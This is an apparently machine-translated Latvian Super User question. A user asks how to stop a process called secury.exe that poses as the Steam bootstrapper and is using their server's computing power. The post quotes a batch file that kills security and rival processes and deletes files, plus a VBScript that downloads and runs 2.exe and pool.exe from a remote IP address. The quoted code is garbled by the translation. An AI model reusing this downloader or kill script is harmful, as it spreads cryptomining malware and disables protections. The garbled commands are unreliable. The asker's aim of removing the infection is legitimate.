logi - Kā neatgriezeniski nogalināt tvaika klienta bootstrapper - Super User
Manā uzdevumu pārvaldniekā man ir šāda situācija:
Es nezinu, kāda veida lietojumprogramma tā ir, bet noteikti nav Steam klienta bootstrapper, jo es to neinstalēju un arī nevaru to atinstalēt.
Ja mēģinu noskaidrot, kāda veida lietotne ir, izmantojot šo soli:
Es redzu kaut ko līdzīgu:
MS Config utilītprogrammā es neatradu neko, kas izskatās kā secury.exe.
Atverot faila atrašanās vietu, redzu trīs failus:
m.bat, b.exe, 4.vbs.
Tālāk sniegts saturs m.bat:
uzdevumlapa / f / t / im secury.exe c: Datu glabāšana.exe uzdevumprogramma / f / t / im kingsoft.exe uzdevumu kopa / f / t / im expl0rer.exe uzdevumlapa / f / t / im ieplare.exev taskkill / f / t / im nssm.exe uzdevumprogramma / f / t / im MSASCui.exe uzdevumprogramma / f / t / SystemSettlngs.exe uzdevumprogramma / f / t / im SystemSetting.exe uzdevumkopa / f / t / im Process.exe uzdevumlapa / f / t / im winlnlt.exe uzdevumkopa / f / t / im WindowsUpgrade.exe uzdevumprogramma / f / t / im msdc.exe uzdevumprogramma / f / t / im Fiddlere.exe uzdevumlapa / f / t / im shovst.exe uzdevumlapa / f / t / im lqrtqe.exe uzdevumprogramma / f / t / im apkls.exe uzdevumprogramma / f / t / im winlog.exe uzdevumkopa / f / t / im svchosts.exe uzdevumlapa / f / t / im win1ogins.exe uzdevumlapa / f / t / im shovsts.exe uzdevumprogramma / f / t / im fcty.exe uzdevumu kopa / f / t / im soiuos.exe uzdevumu kopa / f / t / im TrustedInstaller.exe del C: Windows32 ar šo.exe del C: Windows uzstādīšana TrustedInstaller.exe del C: Programmas DataSoft.exe del C: Programmas dati r0rer.exe del C: Programmas datu ielāde.exe del C: Programmas dati nssm.exe del C: ProgramData MSASCui.exe del C: Pro gramdati SystemSettlngs.exe del C: Programmas dati SystemSetting.exe del C: Programmatūras dati.exe del C: Programmas dati WinLNT.exe del C: Programmas dati WindowsUpgrade.exe del C: Programmas dati msd.exe del C: Programmas dati Fiddlere.exe del C: Programmas dati shovst.exe del C: Programmas dati qrtqe.exe del C: Programmas dati klkl .exe del C: Programmas dati loglog.exe del C: Programmas dati svchtsts.exe del C: Programmas dati win1ogins.exe del C: Programmas dati shovsts.exe del C: Programmas dati fcty.exe del C: Programmas dati.exe.exe C: C: Programmas Datu kopija3.exe
Nākamais iet 4.vbs:
Iestatiet xPost = CreateObject ("Microsoft.XMLHTTP") xPost.Atveriet "GET", "http://223.68.209.7:65510/2.exe", 0 xPost.Send () Set sGet = CreateObject ("ADODB.Stream" ) sGet.Mode = 3 sGet.Type = 1 sGet.Open () sGet.Write (xPost.responseBody) sGet.SaveToFile "c: Programmas dati2.exe", 2 Iestatīt xPost = CreateObject ("Microsoft.XMLHTTP") xPost.Atveriet "GET", "http://223.68.209.7:65510/pool.exe", 0 xPost.Send () Set sGet = CreateObject ("ADODB.Stream") sGet.Mode = 3 sGet.Type = 1 sGet.Open () sGet.Write (xPost.responseBody) sGet.SaveToFile "c: Programmas dati2.exe", 2 CreateObject ("WScript.Shell"). "C: Programmas datu kopums3.exe" IzveidotObjektu ( "WScript.Shell"). Run "del C: Programmas datu kopa3.exe"
Ko es varu darīt, lai apturētu secury.exe no mana servera skaitļošanas pilnvaru ļaunprātīgas izmantošanas?
PS Es esmu izpildījis Avast pilnu manu datora pārbaudi, bet tas neko nepareizi.
Exe no mana servera skaitļošanas pilnvaru ļaunprātīgas izmantošanas?